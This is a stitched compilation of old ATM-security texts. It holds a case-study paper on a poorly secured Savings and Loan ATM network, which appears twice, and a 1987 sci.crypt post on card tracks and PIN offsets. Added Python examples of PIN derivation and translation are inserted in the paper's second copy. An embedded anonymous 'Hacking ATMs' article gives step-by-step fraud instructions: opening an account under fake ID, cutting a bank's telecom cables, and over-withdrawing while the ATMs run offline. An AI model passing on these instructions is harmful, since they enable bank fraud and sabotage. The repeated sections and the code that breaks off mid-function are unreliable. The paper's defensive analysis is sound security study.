Maintaining  the  the  security  of  the  foreign  PIN  is  of  critical
importance.   Given  the  foreign PIN along with the ATM card's magnetic
image, the perpetrator has access to an account  from  any  ATM  on  the
network.    This  would  make  tracking  of  potential  attackers  quite
difficult, since the ATM and the institution they extract funds from can
be  completely  different from the institution where the information was
gleaned.

Given  that  the  encrypted  PIN  goes  through   normal   communication
processes,  it  could  be  logged  on  the normal I/O logs.  Since it is
subject to such logging, the PIN in any form should be denied  from  the
logging function.

3.2.  Security Violations
While  the EFT network has potential to run in a secured mode given some
of the precautions outlined above, the potential for abuse  of  security
is  quite easy.  In the case of this system, security was compromised in
a number of ways, each leading to the potential loss of funds, and to  a
loss of confidence in the EFT system itself.

3.2.1.  Violations of the PIN key method
The  two  custodian  system simply wasn't practical when ATMs were being
installed all over the state.  Two examples show this:   When  asked  by
the  developer  for the PIN key to be entered into a test ATM, there was
first a massive search for the key, and then it was read to him over the
phone.   The  PIN  key  was  written  on  a scrap of paper which was not
secured.  This is the PIN key that all the customer PINs are  based  on,
and which compromise should require the reissue of all PINs.)

The  importance of a system to enter the PIN key by appropriate officers
of the bank should not be overlooked.  In  practice  the  ATM  installer
might  be the one asked to enter the keys into the machine.  This indeed
was demonstrated in this case where the ATM installer not only had  the
keys  for  the  Savings and Loan, but also for other institutions in the
area.  This was kept in the high security area of the  notebook  in  the
installer's front pocket.

Having  a  Master key entered into the ATM by officers of the bank might
add an additional layer of security to the system.  The actual  PIN  key
would then be loaded in encrypted form from the network.  In the example
above, if the installer was aware of the terminal master key,  he  would
have to monitor the line to derive the actual PIN key.

The  use  of  a downline encrypted key was never implemented, due to the
potential complications and added cost of such a  system.   Even  if  it
was,  once violated, security can only be regained by a complete reissue
of customer PINs with the resulting confusion ensuing.

                                 - 3 -

Security
Security Violations
Network validated PIN Security violations

3.2.2.  Network validated PIN Security violations
Given  the  potential  for untraced transactions, the maintenance of the
foreign PINs security was extremely important.  In the PIN  key  example
above,  any  violation  would  directly  affect  the  institution of the
violators.  This would limit the scope of an investigation, and  enhance
the  chance of detection and apprehension.  The violation of foreign PIN
information has a much wider sphere of attack,  with  the  corresponding
lower chance of apprehension.

The  communication  key  itself  was  never  secured.  In this case, the
developer  handed  the  key  to  the  bank  officers,  to   ensure   the
communication  key  didn't get misplaced as the PIN key did (This way he
could recall it in case it got lost).  Given the communication key,  the
security  violation  potential  is  simple enough.  The programmer could
simply  tap  the  line  between  the  ATM  and  the  controller.    This
information  could  then generate a set of PIN and card image pairs.  He
would even have account balances.

Tapping the line would have been an effort, and worse yet he  could  get
caught.   However,  having  the  I/O  logs could serve the same purpose.
While originally designed to obscure PIN information in  the  I/O  logs,
the  feature was disabled due to problems caused by the regional network
during testing.  The I/O logs would be sent to the developer  any  time
there was a problem with the ATM controller or the network interface.

The  generation of PIN and card image pairs has a potential for even the
most secured system on the network  to  be  attacked  by  the  lapse  in
security  of  a weaker node.  Neither the communication key, nor the PIN
should ever be available in the clear.  This requires  special  hardware
at  the  controller  to  store  this  information.   In  this  case, the
institution had no desire to install a  secured  box  for  storing  key
information.   The  communication key was available in software, and the
PIN was in the clear during the process of decrypting from the  ATM  and
re-encrypting  with  the network key.  Any programmer on the system with
access to the controller could put in a log file to tap off the PINs  at
that point.

The largest failure of the system, though, was not a result of the items
described above.  The largest failure in the system was in the method of
encrypting  the  PIN  before  going  to the network.  This is due to the
failure of the network to have a secured key between sites.  The PIN was
to  be  encrypted  with  a  network  key.   The  network key was sent in
encrypted form from the network to the ATM controller.  However, the key
to  decrypt  the network key was sent almost in the clear as part of the
start-of-day sequence.

Any infiltrator monitoring the  line  would  be  able  to  get  all  key
information  by  monitoring the start-of-day sequence, doing the trivial
decryption of the communication key, and proceeding to gather card image
and PIN pairs.  The infiltrator could then generate cards and attack the
system at his leisure.

                                 - 4 -

Security
Security Violations
Network validated PIN Security violations

The network-ATM controller security failure is the most critical feature
since it was defined by a regional network supporting many institutions.
The network was supposedly  in  a  better  position  to  understand  the
security requirements.

4.  The Human Factors in Security  Violation
It is important the users of a system be appraised of the procedures for
securing the system.  They should understand the risks,  and  know  what
they  are  protecting.   The  bank officers in charge of the program had
little experience with ATM systems.  They were never fully indoctrinated
in  the  consequences of a PIN key or communication key compromise.  The
officers showed great surprise when the developer was able  to  generate
PINs  for  supplied  test cards.  Given the potential risk, nothing more
was done to try to change the PIN key,  even  though,  they  were  quite
aware  that  the  PIN  key was in the developer's possession.  They once
even called the developer for the PIN key when they weren't able to find
it.

The  developer  had a desire to maintain a smooth running system and cut
down on the development time of an  already  over-budget  project.   Too
much security, for example modifying I/O logs, could delay the isolation
or repair of a problem.

The regional network was actually a marketing company who  subcontracted
out  the  data processing tasks.  They failed to recognized the security
problem of sending key information with extremely weak encryption.   The
keys  were  all but sent in the clear.  There seemed to be a belief that
the use of encryption in and of itself caused a network to  be  secured.
The  use  of DES with an unsecured communication key gave the appearance
of a secured link.

The lack of audits of the system, both in design and implementation  was
the  final security defect which allowed the system to be compromised in
so many ways.  An example of the Savings and Loan's  internal  auditors
failure  to  understand  the problems or technology is when the auditors
insisted that no contract developers would be  allowed  physically  into
the  computer room.  The fact was, access to the computer room was never
required to perform any of the described violations.

5.  Security Corrections
As in any system where security was required, the time to  implement  it
is  at  the  beginning.  This requires the review of both implementation
ormed  to
verify  that  the  procedures  are  followed  as  described in the plan.
Financing, scheduling and man power for such audits must be allocated so
security issues can be addressed.

For this institution, the first step would have been to indoctrinate the

                                 - 5 -

Security Corrections

banking  officers  of  the risks in the ATM network, the vulnerabilites,
and the security measures required.

Custodians  of  all  keys should be well aware of their responsibilities
for those keys.  A fall back system of key recovery must be in place  in
case an officer is not available for key entry.

The  cost  of installing hardware encryption units at the host should be
included in the cost of putting in the  system.   The  host  unit  could
generate  down-line  keys for both the PIN key and the communication key
thus making it more difficult to derive  these  keys  without  collusion
from at least three people.

A  secured  communications key should be established between the Network
and the institution.  This would  allow  for  the  exchange  of  working
communication  keys.   This  key  should  be  changed  with a reasonable
frequency.

All these areas should be audited in both the system  specification  and
implementation  to  make sure they are not being abridged in the name of
expediency.

6.  Summary
In this view of a single  institution,  a  number  of  failures  in  the
security  system  were  shown.   There  was  shown a definite failure to
appreciate what was required in the way of security for  PINs  and  keys
used  to  derive  PIN  information.   An avoidance of up front costs for
security lead to potentially higher cost in the future.   The  key  area
was the lack of audits of the EFT system by both the institution and the
network, causing potential loss to all institutions on the network.

                                 - 6 -

For those of you who would like a deeper view of thes of ATM
PIN stuff, I'm merging some previous postings along with a paper

Downloaded from Just Say Yes. 2 lines, More than 500 files online!
         Full access on first call. 415-922-2008 CASFA

Hacking ATMs, by Anonymous

                +     -->  HACKING ATM'S  <--      +

   Welcome everybody to my first article dealing with the manipulation of the
   Bank's Automated Teller Machines for the gain of money..
   In this article I will show you many ways to 'beat' the system. Some methods
   of hacking into ATM's are very easy and others are a bit more difficult.
   I suggest you pick the method that mostly suits you.
   Okay Lets get straight into it....
1.0     Different types of Automatic Tellers
============================================
There are 3 major types of Automatic teller machines.
IBM
===
The first of these (and the most popular) is the IBM model. This is easily
distinguished from the others by the IBM logo in the top right hand corner of
the front of the machine.
This unit features a touch sensitive keypad and a 1 line display with a visor
that moves up and down. (The newer models have a 5 line display)..
NCR
===
The second unit is the NCR unit, which is MUCH smaller than the IBM front
panel. This unit has a small VDU as well as a touch sensitive keypad. The only
banks that seem to be using this unit in Australia is the 'STATE BANK' of
Victoria, so you will not see many of them around.
PHILIPS
=======
The third and final unit is made by Philips and is only used by the credit
unions or Building Societies. This is usually known as 'CASHCARD'. These units
feature a push-button keyboard and a VDU (like the NCR).
All these above units provide the same functions...  

1.1   Information on the Plastic Cards
======================================
The Plastic Cards that you put into these cash carrying monsters have a Number
that is printed on the front of the card (which is also the same number, that
is stored on the MAGNETIC STRIP on the back of the card.)
What do these numbers mean????? 
Well here is some information on them...
The Numbers are split up into 2 groups, the first group ALWAYS contains
SIX numbers while the second group contains anywhere between 6 to 13 
numbers.
EG)         560192 3012565214782
            \ /\ /
             |  |__ This 3 digit number identifies the Bank.    
             |
             |__ This is the Australian ID code and ALL banks have this.
   Some ID's for banks
   ===================
         192   -  Westpac Banking Corporation
         251   -  National Australia Bank
         220   -  Commonwealth Bank
The Second part of the number seems to be a jumble of digits for 6 to 13, which
only seem to make sense to the banks computer.
The banks computer simply looks the second number up in a Table and finds out
your assigned PIN number (A password for your card consisting of 4 digits), 
and any other information. eg) Your savings account no. Cheque a/c etc.
Since the four Digit PIN (Personal Identification Numbers) range from 0000 to
9999, then more than one person has the same PIN number for his card. (Banks do
have more than 10,000 customers !!)
Okay now that we have some simple background information we can learn how to
'defeat' the system..
1.2   The "CABLE CUTTER METHOD"
===============================
For this method you will require the Following:
  (1) -  Guts
  (2) -  Good Pair of SIDCHROME cutters
  (3) -  Fake ID (library cards, Concession Cards etc.)
Okay the First Step is to open up a bank savings account at one of the banks
that gives you access to the ATM..
The Major banks have the following Packages:
   Westpac  - Advantage Saver
   National - Flexi Card
   C'wealth - Key Card
I suggest you go for National Bank as their limit is $500 per day, where
Westpac has a $200 Max Limit per day..
Give them an address where you can check the mail everyday (so you can receive
your card and PIN number)...An old house etc. will do very well.
Make sure you open the account at a 'small' suburb branch, that has computer
equipment installed.
Once you have finally received your brand new savings account with fake name
and address
Your account record is kept at your branch's computer. So what the main
computer does is get in touch with the branches (on the network) and ask it
information on your account. (Balance etc.).
Ok so what do we do with the cutters??? Well go to your banks branch (at about
10.00 - 11.00 pm), Find the Concrete Telecom cover near the bank and lift it
off using the handle of the Cutters. 
Ok, See if there are cables leading from the main tube into a smaller tube that
leads underground into the bank...Well take your cutters and snip them..Ok well
congratulations you have just cut the phone cables for all their phones and
their branch computer system..
If you wanna be a bit more sure that you cut the cable to the computer, Snip
every cable in sight of the bank. (Use insulated cutters and don't be afraid of
the sparks and mini fire works.)
Ok the banks computer should be disabled now, so go to the nearest ATM you can
find and pop your card in and try to do a ' ACCOUNT BALANCE '. You should get a
NOT AVAILABLE - try again Later ERROR..If you do then start jumping up and
down cause you have done it!!
You see the main computer is programmed to give you whatever money you ask for
when the lines are down, so they will not inconvenience the customers. So punch
in the max. LIMIT any time before 12 midnight and then take out another batch
after 12.00 midnight (or whatever other time you can)..
When they Fix the Lines, the main computer will update the balance in the
branches computer... (he he). Your account will have a Debit Balance and the
bank manager will come after you..But he won't find you will he!!
The major banks that use this new system are:  Westpac and National.
I have tried it with both banks and it works great. Although I prefer National
Bank since you can make $1,000 in a few minutes.

ATM secret codes, from Fred Ginsburg (July 10, 1987)

From ames!amdahl!nsc!voder!wlbr!gins Mon Jul 13 12:41:23 PDT 1987
Article 479 of sci.crypt:
Path: ames!amdahl!nsc!voder!wlbr!gins
From: gins@wlbr.UUCP (Fred Ginsburg)
Newsgroups: sci.crypt
Subject: Re: ATM secret codes
Summary: ATM stuff LONG...
Message-ID: <1038@wlbr.UUCP>
Date: 10 Jul 87 18:29:09 GMT
Organization: Eaton IMS, Westlake Village, CA
Lines: 445

In article <548@l.cc.purdue.edu>, roz@l.cc.purdue.edu (Vu Qui Hao-Nhien) writes:
> In article <127@ddsw1.UUCP> karl@ddsw1.UUCP (Karl Denninger) writes:
> >In article <192@sugar.UUCP>, karl@sugar.UUCP (Karl Lehenbauer) writes:
> 
> The transactions done by ATM sometimes (not always) are kept by the
> machine until remove by human hands and fed to the bank's computer at
> its headquarters.  Hence not much communication between ATM and the
> outside world.
> -- 

For those of you who would like a deeper view of the wonders of ATM
PIN stuff, I'm merging some previous postings along with a paper
on computer security.  Any questions, give a call (818-706-4146)

or send to {trwrb,ihnp4}!wlbr!gins 

***************  Track Layouts ************************

This is off the top of my head, but is 99% there.  Also I'll ignore
some obsolete stuff.

The physical layout of the cards are standard.  The LOGICAL makeup
varies from institution to institution.  There are some generally
followed layouts, but not mandatory.

There are actually up to three tracks on a card.

Track 1 was designed for airline use.  It contains your name and
usually your account number.  This is the track that is used when
the ATM greets you by name.  There are some glitches in how things
are ordered so occasionally you do get "Greetings Bill Smith Dr."
but such is life.  This track is also used with the new airline
auto check in (PSA, American, etc)

Track 3 is the "OFF-LINE" ATM track.  It contains such nifty
information as your daily limit, limit left, last access, account
number, and expiration date.  (And usually anything I describe in track
2).  The ATM itself could have the ability to rewrite this track to
update information.

Track 2 is the main operational track for online use.  The first thing
on track two is the PRIMARY ACCOUNT NUMBER (PAN).  This is pretty
standard for all cards, though no guarantee.  Some additional info
might be on the card such as expiration date.  One interesting item
is the PIN offset.   When an ATM verifies a PIN locally, it usually
uses an encryption scheme involving the PAN and a secret KEY.
This gives you a "NATURAL PIN" (i.e. when they mail you your pin, this
is how it got generated.)  If you want to select your own PIN, they
would put the PIN OFFSET in the clear on the card.  Just do modulo 10
arithmetic on the Natural PIN plus the offset, and you have the
selected PIN.  YOUR PIN IS NEVER IN THE CLEAR ON YOUR CARD.  Knowing
the PIN OFFSET will not give you the PIN.  This would require the
SECRET KEY.

Hope that answers your question

************ Deposits at ATMs ************************

Deposits on ATM:

Various banks have various systems.  As an example, at CITIbank
a deposit was made to a specific account.  Your account was updated
with a MEMO update, i.e. it would show up on your balance.  However
it did not become AVAILABLE funds until it was verified by a teller.
On the envelope was Customer ID number, the envelope number and
the Entered dollar amount, the branch # and the Machine #.

There was also a selection for OTHER PAYMENTS.  This allowed you to
dump any deposit into the ATM.

What are you assured then when you deposit to an ATM ?

1) You have a banking RECORD (not a receipt at Citibank).  If you
   have this record, there is a VERY high percentage that you
   deposited something at that ATM.

2) Some banks have ways of crediting your deposit RIGHT NOW.
   This could be done by a balance in another account (i.e. a long
   term C.D. or a line of credit.)  That way they can get you if
   you lied.

**************  ATM Splitting a Card in half ***************

   I've worked with about 75% of the types of machines on the market
and NONE of them split a card in half upon swallow.  However, some
NETWORKS have a policy of  slicing a card to avoid security
problems.

Trusting an ATM.
Interesting you should bring this up, I'm just brushing up a paper
describing a REAL situation where your card and PIN are in the clear.
This involves a customer using a bank that is part of a network.
All the information was available to folks in DP, if they put in some
efforts to get it.

          Mis-Implementation of an ATM PIN security system

1.  Synopsis
In an EFT (Electronic Funds Transfer) network, a single node which  does
not  implement  the  proper  security  can  have  effects throughout the
network.  In this paper, the author describes an example of how security
features  were  ignored, never-implemented, and/or incorrectly designed.
The human factors involved in the final implementation are  explored  by
showing  several major vulnerabilities caused by a Savings and Loan and a
regional EFT network's lack of vigilance in installing  an  EFT  network
node.   While  using  an  EFT  system as an example, the concepts can be
extrapolated into the implementation of other secured systems.

2.  Background
A small Savings and Loan  was  setting  up  a  small  (10  to  16  ATMs)
proprietary  Automatic  Teller  Machine (ATM) network.  This network was
then intended to link up to a regional network.  The manufacturer of the
institution's  online  banking  processor  sent an on-site programmer to
develop the required interfaces.

An ATM network consists of three main  parts.   The  first  is  the  ATM
itself.   An ATM can have a range of intelligence.  In this case the ATM
was able to decode a  PIN  (Personal  Identification  Number)  using  an
institution  supplied  DES  (Data Encryption Standard) key.  It was then
required to send a request for funds to the host where it would receive
authorization.

The second portion of the network is the ATM controller.  The controller
monitors the transaction, and routes the message  to  the  authorization
processor.   The  controller  would  also generally monitor the physical
devices and statuses of the ATM.

The third portion of the network is the authorization system.   In  this
case  customers  of  the  local  institution  would have the transaction
authorized on the same processor.  Customers  from  foreign  (i.e.   one
that  does not belong to the institution that runs the ATM) institutions
would be authorized by the regional  network.   Authorization  could  be
from  a  run-up  file which establishes a limit on withdrawals
for a  given  account  during  a  given  period.   A  better  method  is
authorization direct from the institution which issued the card.

3.  Security
The system has a two component key system to allow access to the network
by the customer.  The first  is  the  physical  ATM  card  which  has  a
magnetic stripe.  The magnetic stripe contains account information.  The
second component is the Personal Identification Number (PIN).   The  PIN
is hand entered by the customer into the ATM at transaction time.  Given
these  two  parts,  the  network  will  assume  that  the  user  is  the
appropriate customer and allow the transaction to proceed.

The magnetic stripe is in the clear and may be assumed to be reproducible
using various methods, thus the PIN is the crucial security element.

3.1.  PIN security

3.1.1.  PIN key validation method

PINs can be linked to a particular card in a number of ways.  One
method stores each PIN in a central data base in a one-way encrypted
form.  When a PIN is presented, it is encrypted the same way and
compared with the stored value.  This method requires a way to protect
the PIN given at the ATM until it can be verified at the central site.
Problems can also occur if the institution wants to move the PIN data
base to another processor, especially one from a different computer
vendor.

Another method is to take information on the card, combine it with an
institution PIN encryption key (PIN key) and use that to generate the
PIN.  The institution in question used the PIN key method.  This allows
the customer to be verified at the ATM itself, and no transmission of
the PIN is required.  The risk of this approach is that the PIN key
must be maintained under the tightest of security.

The PIN key is used to generate the natural PIN.  This is derived by
encrypting the account number with DES under the PIN key.  The
resulting value is then decimalized by looking up each hexadecimal
digit in a 16-entry decimalization table that maps it to a decimal
digit.  An ATM loaded with the appropriate PIN key can then validate a
customer locally with no need to send PIN information to the network,
thereby reducing the risk of compromise.

The PIN key requires the utmost security.  Once the PIN key is known,
any customer's ATM card, with the corresponding PIN, can be created
given the customer's account number.  The ATM allows the PIN key to be
entered in two parts, so that each of two bank officers knows only one
half of the key.  If desired, a terminal master key can be loaded
instead and the PIN key then loaded, in encrypted form, from the
network.

The decimalization table usually maps the sixteen hexadecimal digits
("0" to "F", where "F" = 15) to the decimal digits 0 to 9 followed by
0 to 5.  The decimalization table can be put into any order,
scrambling the digits and slowing down an attacker.  (As a side note,
with the "standard" table the PIN digits are weighted toward 0 through
5, each of which has a 1/8 chance of being the digit, while 6 through
9 each have only a 1/16 chance.)
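The derivation just described, as an added worked example (this code is
not from the paper; it is illustrative only).  Python's standard library
has no DES, so a keyed SHA-256 truncated to 8 bytes stands in for the DES
encryption of the account number; the packing of the account number into
the 8-byte block and the 4-digit PIN length are also assumptions.  The
block also implements the PIN offset scheme described in the sci.crypt
post reproduced later on this page, and computes the digit weights of the
standard decimalization table so the side note above can be checked:

```python
"""Natural-PIN derivation with a decimalization table, plus PIN offset.
Added example, not from the paper; assumptions are marked below."""
import hashlib
import hmac
from collections import Counter

# The "standard" table: hex digit i maps to the i-th character of this string.
STANDARD_TABLE = "0123456789012345"
# A scrambled table, as the paper suggests: the same entries in another order.
SCRAMBLED_TABLE = "5092814736150243"


def block_encrypt(pin_key: bytes, block8: bytes) -> bytes:
    """Stand-in for one DES encryption of an 8-byte block.
    Assumption: the standard library has no DES, so a keyed SHA-256
    truncated to 8 bytes plays the role of the cipher.  It is not DES."""
    if len(block8) != 8:
        raise ValueError("block must be 8 bytes")
    return hmac.new(pin_key, block8, hashlib.sha256).digest()[:8]


def pan_block(pan: str) -> bytes:
    """Pack the account number into an 8-byte block (assumption: rightmost
    16 digits, zero-padded on the left, packed two digits per byte)."""
    digits = pan[-16:].rjust(16, "0")
    if not digits.isdigit():
        raise ValueError("PAN must be numeric")
    return bytes.fromhex(digits)


def natural_pin(pin_key: bytes, pan: str, table: str = STANDARD_TABLE,
                length: int = 4) -> str:
    """Encrypt the PAN block under the PIN key, then map the leading hex
    digits of the result through the decimalization table."""
    if len(table) != 16:
        raise ValueError("decimalization table needs 16 entries")
    hexdigits = block_encrypt(pin_key, pan_block(pan)).hex()
    return "".join(table[int(h, 16)] for h in hexdigits[:length])


def pin_offset(natural: str, chosen: str) -> str:
    """Offset that may be stored in the clear on the card so a customer can
    choose a PIN: chosen minus natural, digit by digit modulo 10."""
    return "".join(str((int(c) - int(n)) % 10) for n, c in zip(natural, chosen))


def customer_pin(natural: str, offset: str) -> str:
    """Recover the customer-selected PIN from the natural PIN and offset."""
    return "".join(str((int(n) + int(o)) % 10) for n, o in zip(natural, offset))


def digit_probabilities(table: str) -> dict:
    """Probability of each decimal digit in one natural-PIN position,
    assuming the cipher's hex output digit is uniform."""
    counts = Counter(table)
    return {d: counts[d] / 16 for d in "0123456789"}


if __name__ == "__main__":
    key = bytes.fromhex("0123456789abcdef")  # constructed demo key, not a real one
    pan = "4000123456789010"                 # constructed demo account number
    nat = natural_pin(key, pan)
    off = pin_offset(nat, "7391")
    print("natural PIN:", nat, "offset on card:", off,
          "customer PIN:", customer_pin(nat, off))
    print("standard table digit weights:", digit_probabilities(STANDARD_TABLE))
```

Note what the last function shows: scrambling the table changes which hex
value maps to which digit, but not how often each digit occurs, so the
1/8 versus 1/16 weighting survives any reordering of the sixteen entries.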

When handling a foreign card (i.e. one that does not belong to the
institution that runs the ATM), the PIN must be passed on to the
network in encrypted form.  First, however, it must be passed from the
ATM to the ATM controller.  This is accomplished by encrypting the PIN
entered at the ATM under a communication key.  The communication key
is entered at the ATM much like the PIN key; alternatively, it can be
downloaded from the network.  The PIN is decrypted at the controller
and then re-encrypted with the network's communication key.


Maintaining the security of the foreign PIN is of critical importance.
Given the foreign PIN along with the ATM card's magnetic image, the
perpetrator has access to an account from any ATM on the network.
This makes tracking of potential attackers quite difficult, since the
ATM and the institution they extract funds from can be completely
different from the institution where the information was gleaned.

Given that the encrypted PIN goes through normal communication
processes, it could be logged on the normal I/O logs.  Since it is
subject to such logging, the PIN, in any form, must be excluded from
the logging function.

3.2.  Security Violations
While the EFT network has the potential to run in a secured mode given
the precautions outlined above, its security is quite easy to abuse.
In the case of this system, security was compromised in a number of
ways, each leading to the potential loss of funds and to a loss of
confidence in the EFT system itself.

3.2.1.  Violations of the PIN key method
The two-custodian system simply wasn't practical when ATMs were being
installed all over the state.  Two examples show this.  When the
developer asked for the PIN key to be entered into a test ATM, there
was first a massive search for the key, and then it was read to him
over the phone.  The PIN key was written on a scrap of paper which was
not secured.  (This is the PIN key on which all the customer PINs are
based, and whose compromise should require the reissue of all PINs.)

The importance of a system for entering the PIN key by appropriate
officers of the bank should not be overlooked.  In practice the ATM
installer might be the one asked to enter the keys into the machine.
This was indeed demonstrated in this case, where the ATM installer had
not only the keys for the Savings and Loan but also those for other
institutions in the area.  They were kept in the high-security area of
the notebook in the installer's front pocket.

Having a master key entered into the ATM by officers of the bank would
add an additional layer of security to the system.  The actual PIN key
would then be loaded in encrypted form from the network.  In the
example above, even if the installer knew the terminal master key, he
would still have to monitor the line to derive the actual PIN key.

The use of a down-line encrypted key was never implemented, due to the
potential complications and added cost of such a system.  Even if it
had been, once the key is compromised, security can only be regained
by a complete reissue of customer PINs, with the resulting confusion.


3.2.2.  Network validated PIN Security violations
Given the potential for untraced transactions, maintaining the security
of foreign PINs was extremely important.  In the PIN key example
above, any violation would directly affect the violators' own
institution.  This would limit the scope of an investigation and
enhance the chance of detection and apprehension.  The violation of
foreign PIN information has a much wider sphere of attack, with a
correspondingly lower chance of apprehension.

The communication key itself was never secured.  In this case, the
developer handed the key to the bank officers, to ensure that the
communication key didn't get misplaced as the PIN key did (this way he
could recall it in case it got lost).  Given the communication key,
the potential security violation is simple enough.  The programmer
could simply tap the line between the ATM and the controller.  This
information could then be used to generate a set of PIN and card image
pairs.  He would even have account balances.

Tapping the line would have taken effort, and worse yet, he could get
caught.  However, having the I/O logs could serve the same purpose.
Although the controller was originally designed to obscure PIN
information in the I/O logs, the feature was disabled due to problems
caused by the regional network during testing.  The I/O logs would be
sent to the developer any time there was a problem with the ATM
controller or the network interface.

The generation of PIN and card image pairs means that even the most
secure system on the network can be attacked through the lapse in
security of a weaker node.  Neither the communication key nor the PIN
should ever be available in the clear.  This requires special hardware
at the controller to store this information.  In this case, the
institution had no desire to install a secured box for storing key
information.  The communication key was available in software, and the
PIN was in the clear during the process of decrypting from the ATM and
re-encrypting with the network key.  Any programmer on the system with
access to the controller could put in a log file to tap off the PINs
at that point.
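An added example (not from the paper) of the controller-side
translation step described in the foreign-card discussion above, with
the I/O log handling the paper says was designed but disabled.  The
cipher is a stand-in keystream derived from SHA-256 (the standard
library has no DES), and the clear PIN block layout, the message fields
and the log format are assumptions.  The same decrypt call, run by
someone who holds the ATM communication key over a tapped line, is the
card-image-and-PIN collection the paper describes:

```python
"""Controller-side PIN translation and I/O log hygiene (added example)."""
import hashlib
import hmac


def keystream(key: bytes, label: bytes) -> bytes:
    """Stand-in for DES on an 8-byte block (assumption: the standard
    library has no DES, so a keyed SHA-256 output truncated to 8 bytes is
    XORed onto the block; the data flow, not the cipher, is the point)."""
    return hmac.new(key, label, hashlib.sha256).digest()[:8]


def xor8(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def pin_block(pin: str) -> bytes:
    """Assumed clear PIN block layout: length nibble, PIN digits, F fill."""
    if not (4 <= len(pin) <= 12 and pin.isdigit()):
        raise ValueError("PIN must be 4 to 12 digits")
    return bytes.fromhex((f"{len(pin):x}" + pin).ljust(16, "F"))


def pin_from_block(block: bytes) -> str:
    h = block.hex()
    return h[1:1 + int(h[0], 16)]


def encrypt_pin(key: bytes, pin: str, pan: str) -> bytes:
    """Encrypt the PIN block under a communication key, bound to the PAN."""
    return xor8(pin_block(pin), keystream(key, pan.encode()))


def decrypt_pin(key: bytes, blob: bytes, pan: str) -> str:
    return pin_from_block(xor8(blob, keystream(key, pan.encode())))


def loggable(msg: dict) -> dict:
    """The only form of a request allowed into the I/O log: PAN truncated
    to first six and last four digits, PIN block dropped entirely."""
    pan = msg["pan"]
    return {"pan": pan[:6] + "*" * (len(pan) - 10) + pan[-4:],
            "amount": msg["amount"],
            "pin_block": "<suppressed>"}


def translate_pin(msg: dict, atm_key: bytes, network_key: bytes,
                  log: list, suppress_pin: bool = True) -> dict:
    """Decrypt the ATM's PIN block and re-encrypt it under the network key.
    Between the two calls the PIN is in the clear inside this process,
    which is the window the paper warns about.  suppress_pin=False mirrors
    the disabled log-obscuring feature: the raw request is logged."""
    clear_pin = decrypt_pin(atm_key, msg["pin_block"], msg["pan"])
    out = dict(msg, pin_block=encrypt_pin(network_key, clear_pin, msg["pan"]))
    if suppress_pin:
        log.append(repr(loggable(out)))
    else:
        log.append(repr(dict(msg, clear_pin=clear_pin)))  # the leak
    return out


if __name__ == "__main__":
    # Constructed demo keys and request; not real data.
    atm_key, net_key = b"atm-comm", b"net-comm"
    pan = "4000123456789010"
    request = {"pan": pan, "amount": 100,
               "pin_block": encrypt_pin(atm_key, "1234", pan)}
    log = []
    forwarded = translate_pin(request, atm_key, net_key, log)
    print("network recovers:", decrypt_pin(net_key, forwarded["pin_block"], pan))
    print("I/O log entry:", log[0])
```

The design point is that the log never receives the message object
itself, only the result of loggable(), so a later "just log everything
while we debug" change has to be made deliberately and visibly.  In a
real controller the translate step would run inside the hardware unit
the paper calls for, so the clear PIN never exists in host memory at all.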

The largest failure of the system, though, was not a result of the items
described above.  It was in the method of encrypting the PIN before it
went to the network, which came down to the network's failure to have a
secured key between sites.  The PIN was to be encrypted with a network
key.  The network key was sent in encrypted form from the network to
the ATM controller.  However, the key to decrypt the network key was
itself sent almost in the clear as part of the start-of-day sequence.

Any infiltrator monitoring the line would be able to get all key
information by monitoring the start-of-day sequence, doing the trivial
decryption of the communication key, and proceeding to gather card
image and PIN pairs.  The infiltrator could then generate cards and
attack the system at his leisure.


The network-to-ATM-controller failure is the most critical, since the
interface was defined by a regional network supporting many
institutions.  The network was supposedly in a better position to
understand the security requirements.

4.  The Human Factors in Security Violation
It is important that the users of a system be apprised of the
procedures for securing the system.  They should understand the risks
and know what they are protecting.  The bank officers in charge of the
program had little experience with ATM systems.  They were never fully
briefed on the consequences of a PIN key or communication key
compromise.  The officers showed great surprise when the developer was
able to generate PINs for supplied test cards.  Despite the potential
risk, nothing was done to change the PIN key, even though they were
quite aware that the PIN key was in the developer's possession.  They
once even called the developer for the PIN key when they weren't able
to find it.

The  developer  had a desire to maintain a smooth running system and cut
down on the development time of an  already  over-budget  project.   Too
much security, for example modifying I/O logs, could delay the isolation
or repair of a problem.

The regional network was actually a marketing company which
subcontracted out the data processing tasks.  They failed to recognize
the security problem of sending key information with extremely weak
encryption.  The keys were all but sent in the clear.  There seemed to
be a belief that the use of encryption in and of itself made a network
secure.  The use of DES with an unsecured communication key gave the
appearance of a secured link.

The lack of audits of the system, both in design and implementation,
was the final security defect which allowed the system to be
compromised in so many ways.  An example of the Savings and Loan's
internal auditors' failure to understand the problems or the technology
was their insistence that no contract developers be allowed physically
into the computer room.  The fact was, access to the computer room was
never required to perform any of the described violations.

5.  Security Corrections
As in any system where security is required, the time to implement it
is at the beginning.  This requires the review of both implementation
and operational plans for the network.  Audits should be performed to
verify that the procedures are followed as described in the plan.
Financing, scheduling and manpower for such audits must be allocated
so security issues can be addressed.

For this institution, the first step would have been to brief the
banking officers on the risks in the ATM network, the vulnerabilities,
and the security measures required.

Custodians of all keys should be well aware of their responsibilities
for those keys.  A fallback system of key recovery must be in place in
case an officer is not available for key entry.

The  cost  of installing hardware encryption units at the host should be
included in the cost of putting in the  system.   The  host  unit  could
generate  down-line  keys for both the PIN key and the communication key
thus making it more difficult to derive  these  keys  without  collusion
from at least three people.

A secured communications key should be established between the network
and the institution.  This would allow for the exchange of working
communication keys.  This key should be changed with reasonable
frequency.
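An added example (not the paper's or the institution's code) of the key
management structure recommended in this section: a key-encrypting key
entered in split components by separate custodians, as the two-part PIN
key entry in section 3.1.1 already allows, with working PIN and
communication keys generated by the host unit, sent down-line wrapped
under it, and rotated by generation.  The XOR-based wrapping stands in
for DES (absent from the standard library), and the 8-byte key size, the
key_id labels and the session class are assumptions.  The weak
start-of-day encoding the paper criticizes is not described on the page
and is not modeled here:

```python
"""Split-knowledge key entry and down-line working keys (added example)."""
import hashlib
import hmac
import secrets

KEY_LEN = 8  # assumption: single-DES sized keys, as in the paper's setting


def keystream(key: bytes, label: bytes) -> bytes:
    """Stand-in for DES (not in the standard library): 8 keyed bytes from
    SHA-256, XORed onto a key to wrap it.  Assumption, not the real cipher."""
    return hmac.new(key, label, hashlib.sha256).digest()[:KEY_LEN]


def xor_bytes(*parts: bytes) -> bytes:
    out = bytes(KEY_LEN)
    for p in parts:
        if len(p) != KEY_LEN:
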